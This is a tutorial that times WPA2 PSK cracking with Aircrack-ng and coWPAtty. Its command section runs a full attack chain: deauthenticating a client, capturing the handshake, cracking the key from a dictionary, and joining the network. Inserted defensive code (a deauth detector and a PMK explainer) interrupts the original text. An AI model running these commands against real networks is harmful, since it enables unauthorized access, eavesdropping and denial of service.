Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.

The video shows four different cracks; the time taken and speed of each are in the results below:

  • Aircrack-ng (Dictionary)
  • Aircrack-ng & airolib-ng (Pre-computed hashes)
  • coWPAtty (Dictionary)
  • coWPAtty & Genpmk (Pre-computed hashes)

Links

Download video: http://download.g0tmi1k.com/videos_archive/WPA2-Aircrack-ng_vs_Cowpatty.mp4

Method

To crack a WPA/WPA2 PSK you need to capture a 'handshake'. The quickest way to get this packet is for the attacker to disconnect a client that is currently on the network (if the attacker keeps repeating this step, it becomes a DoS against that user).
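The disconnect step described above is the part a defender can see on the air: 802.11 deauthentication and disassociation frames are not authenticated unless 802.11w (Protected Management Frames) is in use, so a monitor-mode sensor can flag a run of them carrying one source address. The following is an added example, not code from the original post or from the Aircrack-ng or coWPAtty projects: a small Python detector run over a constructed frame log. The `timestamp type src dst` line format and the sample frames are made up for this illustration and are not airodump-ng output. A single forged deauth is hard to tell from a normal disconnect, so the detector reports bursts, which is what the repeated deauth the post calls a DoS looks like from the sensor's side.

```python
"""Flag bursts of 802.11 deauthentication/disassociation frames per source address.

Added example for this post. The frame log format is constructed for the
illustration (one frame per line: <epoch seconds> <frame type> <source MAC>
<destination MAC>); it is not the output of airodump-ng or any other tool.
"""
from collections import defaultdict

# Constructed sample log: one client on one AP, then six deauths carrying the
# AP's address within half a second, then a single deauth sent by the client
# itself much later (a normal disconnect, which must not alert).
SAMPLE_LOG = """\
1000.00 beacon   00:24:b2:a0:51:14 ff:ff:ff:ff:ff:ff
1000.10 data     00:14:17:94:90:0d 00:24:b2:a0:51:14
1000.50 deauth   00:24:b2:a0:51:14 00:14:17:94:90:0d
1000.60 deauth   00:24:b2:a0:51:14 00:14:17:94:90:0d
1000.70 deauth   00:24:b2:a0:51:14 00:14:17:94:90:0d
1000.80 deauth   00:24:b2:a0:51:14 00:14:17:94:90:0d
1000.90 deauth   00:24:b2:a0:51:14 00:14:17:94:90:0d
1001.00 deauth   00:24:b2:a0:51:14 ff:ff:ff:ff:ff:ff
1005.00 data     00:14:17:94:90:0d 00:24:b2:a0:51:14
1200.00 deauth   00:14:17:94:90:0d 00:24:b2:a0:51:14
"""

DISCONNECT_TYPES = {"deauth", "disassoc"}


def parse_frames(text):
    """Parse the constructed log into (timestamp, type, src, dst) tuples, skipping malformed lines."""
    frames = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, ftype, src, dst = parts
        frames.append((float(ts), ftype.lower(), src.lower(), dst.lower()))
    return frames


def _summarize(src, burst):
    # (source MAC, time of first frame, frames in burst, distinct destination addresses)
    return (src, burst[0][0], len(burst), len({dst for _, dst in burst}))


def detect_deauth_bursts(frames, threshold=4, max_gap_s=2.0):
    """Group disconnect frames per source into bursts and report the large ones.

    Consecutive disconnect frames from one source that arrive no more than
    max_gap_s seconds apart form one burst. Every burst of at least `threshold`
    frames is returned as (src, start_ts, count, distinct_targets), oldest first.
    """
    by_src = defaultdict(list)
    for ts, ftype, src, dst in frames:
        if ftype in DISCONNECT_TYPES:
            by_src[src].append((ts, dst))

    alerts = []
    for src, events in by_src.items():
        events.sort()
        burst = [events[0]]
        for event in events[1:]:
            if event[0] - burst[-1][0] <= max_gap_s:
                burst.append(event)
                continue
            if len(burst) >= threshold:
                alerts.append(_summarize(src, burst))
            burst = [event]
        if len(burst) >= threshold:
            alerts.append(_summarize(src, burst))
    return sorted(alerts, key=lambda alert: alert[1])


if __name__ == "__main__":
    for src, start, count, targets in detect_deauth_bursts(parse_frames(SAMPLE_LOG)):
        print(f"{start:.2f}: burst of {count} deauth/disassoc frames from {src} "
              f"towards {targets} address(es)")
```

On the sample log this reports one burst of six frames from the AP address towards two destinations (the client and broadcast) and stays quiet about the client's own single deauth. The threshold and gap are tuning knobs; on a real sensor the source address of a forged deauth is the AP's, so the alert is about frames claiming to come from your own AP at a rate your AP would not produce, and enabling 802.11w on the AP and clients is the fix rather than the detection.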

Once the handshake has been captured, an offline dictionary attack can begin. If the network key is in the dictionary, it's just a matter of waiting for the dictionary file to be processed.

From there, the attacker can use that key to decrypt the data captured earlier, and so is able to 'read' it as well as join the network.

If there isn't a connected client, you can't do this. If the network key isn't in the dictionary file, you can't do this.

You can speed up the cracking process by creating pre-calculated hash files (see the results for how much faster).

Results

Software                    Time (seconds)   Keys per second   Pre-calculate time (seconds)
Aircrack-ng                 256.2            652.94            0
Aircrack-ng & Airolib-ng    2                65685.4           1162.2
Cowpatty                    787.71           205.35            0
Cowpatty & Genpmk           1.25             129715.92         1228.06
Aircrack-ng & Airolib-ng    1164.2           65685.4           1162.2     (crack time plus pre-calculation)
Cowpatty & Genpmk           1229.31          129715.92         1228.06    (crack time plus pre-calculation)

  • The dictionary had 311141 lines (3.33M (3,499,543 bytes)).
  • The WPA key was on line 202762.
  • Therefore it had to test 65.1% of the dictionary.

Aircrack-ng is faster at the plain dictionary attack, whereas coWPAtty & genpmk is faster with pre-computed hashes (though those hashes also take longer to calculate).
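Why the pre-computation costs 1162 to 1228 seconds up front, and why the resulting tables are tied to one network name: in WPA/WPA2-Personal the Pairwise Master Key is PBKDF2-HMAC-SHA1 over the passphrase, with the SSID as the salt, 4096 iterations, 32 bytes of output (IEEE 802.11i). Producing a 32-byte output from a 20-byte hash takes two PBKDF2 blocks, so every candidate costs 8192 HMAC-SHA1 calls; that is the expensive step, and a table of ready-made PMKs removes it from the per-handshake check, which is the speed-up the results above show. Because the SSID is the salt, a table built for one SSID says nothing about any other, which is also why genpmk and airolib-ng are given the ESSID. The following is an added example, not code from this post or from either tool: Python deriving the PMK with the standard library's hashlib, checked against the 802.11i test vector (passphrase 'password', SSID 'IEEE'), and a toy PMK table showing that the same passphrase under a different SSID does not match. The second passphrase in the toy table is a constructed sample value.

```python
"""Derive a WPA/WPA2-Personal PMK and show why pre-computed PMK tables are SSID-specific.

Added example for this post; it uses only the Python standard library and is not
code from Aircrack-ng, airolib-ng, coWPAtty or genpmk.
"""
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for the passphrase-to-PSK mapping
PMK_LENGTH = 32            # bytes; two SHA-1 sized PBKDF2 blocks, hence 8192 HMAC calls

# Test vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
IEEE_TEST_VECTOR = ("password", "IEEE",
                    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32). The SSID is the salt."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"),
                               PBKDF2_ITERATIONS, PMK_LENGTH)


def build_pmk_table(passphrases, ssid):
    """Toy version of what genpmk/airolib-ng store: PMK -> passphrase, valid for one SSID only."""
    return {derive_pmk(p, ssid): p for p in passphrases}


def lookup_passphrase(table, pmk):
    """Return the passphrase behind a PMK if it is in the table, else None."""
    return table.get(pmk)


def matches_test_vector() -> bool:
    passphrase, ssid, expected_hex = IEEE_TEST_VECTOR
    return derive_pmk(passphrase, ssid).hex() == expected_hex


if __name__ == "__main__":
    print("802.11i test vector reproduced:", matches_test_vector())
    # "letmein12" below is a constructed sample passphrase, not from the post.
    table = build_pmk_table(["password", "letmein12"], "IEEE")
    same_ssid = lookup_passphrase(table, derive_pmk("password", "IEEE"))
    other_ssid = lookup_passphrase(table, derive_pmk("password", "OtherSSID"))
    print("table built for 'IEEE', looked up for 'IEEE':     ", same_ssid)
    print("table built for 'IEEE', looked up for 'OtherSSID':", other_ssid)
```

Two consequences fall straight out of the salt: an access point with a unique SSID gets no benefit from any table computed in advance for common names, and a long random passphrase is simply not in any dictionary, so neither the 256-second nor the 1.25-second figure above applies to it. Changing only the SSID, on the other hand, forces the attacker to redo the 1162 to 1228 seconds of pre-calculation but does nothing against a weak passphrase.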

Tools

  • Aircrack-ng suite
  • WiFi card that supports monitor mode
  • Big dictionary
  • Processing power

Software

Name: Aircrack-ng

Version: 1.0-rc3

Home Page: http://www.aircrack-ng.org/doku.php

Download Link: hxxp://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz


Name: coWPAtty

Version: 4.3

Home Page: hxxp://www.willhackforsushi.com/Cowpatty.html (new: http://www.willhackforsushi.com/?page_id=50)

Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz

Commands

# Monitor mode and network discovery
airmon-ng start wlan0
airodump-ng mon0

# Capture traffic from the target network (handshake included)
airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

# Disconnect one client to force a handshake, then Aircrack-ng (dictionary)
aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt

# Aircrack-ng & airolib-ng (pre-computed hashes)
airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack-ng -r crackwpa output-01.cap

# coWPAtty (dictionary)
cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt

# coWPAtty & genpmk (pre-computed hashes)
genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash

# Join the network with the recovered key
wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1

Notes

  • Re-recorded the video

Song: Hi Friend (Original) - Deadmau5

Video length: 05:37

Capture length: 01:14:29

Blog Post: https://blog.g0tmi1k.com/2010/02/cracking-wifi-wpawpa2-aircrack-ng/